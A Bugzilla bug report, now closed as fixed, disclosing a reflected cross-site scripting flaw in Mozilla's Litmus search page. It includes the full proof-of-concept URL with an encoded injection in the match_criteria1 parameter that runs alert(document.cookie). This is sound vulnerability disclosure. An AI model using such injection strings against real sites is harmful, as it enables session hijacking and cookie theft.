Closed
Bug 795689
Opened 12 years ago
Closed 12 years ago
litmus
Categories
(Webtools Graveyard :: Litmus, defect)
Webtools Graveyard
Litmus
Tracking
(Not tracked)
RESOLVED
FIXED
People
(Reporter: ladronul, Unassigned)
References
()
Details
Attachments
(1 file)
237.80 KB,
image/png
|
Details |
User Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.4 (KHTML, like Gecko) Chrome/22.0.1229.79 Safari/537.4 Steps to reproduce: I found a cross site scripting vulnerability Actual results: Vulnerable url : https://litmus.mozilla.org/advanced_search.cgi?start_date=&end_date=&search_value1=20101108200001&search_value2=anamaria.moldovan@softvision.ro&search_value3=&search_value4=&limit=15&automated=all&withbugs=all&test_run=195&product=11&branch=36&testgroup=230&subgroup=&testcase=&platform=17&opsys=50&locale=&result_status=pass×pan=&search_field1=build_id&match_criteria1=%22/%3E%3C/a%3E%3C/%3E%3Cimg%20src=1.gif%20onerror=alert%28document.cookie%29%3E&search_field2=&match_criteria2=contains_any&search_field3=&match_criteria3=contains_all&search_field4=&match_criteria4=contains_all&sort_field1=&sort_order1=ASC&sort_field2=&sort_order2=ASC&sort_field3=&sort_order3=ASC&sort_field4=&sort_order4=ASC vulnerable parameter: match_criteria1 i tested it wuth latest version of firefox.
Updated•12 years ago
|
Status: UNCONFIRMED → RESOLVED
Closed: 12 years ago
Resolution: --- → FIXED
Assignee | ||
Updated•8 years ago
|
Product: Webtools → Webtools Graveyard
You need to log in
before you can comment on or make changes to this bug.
Description
•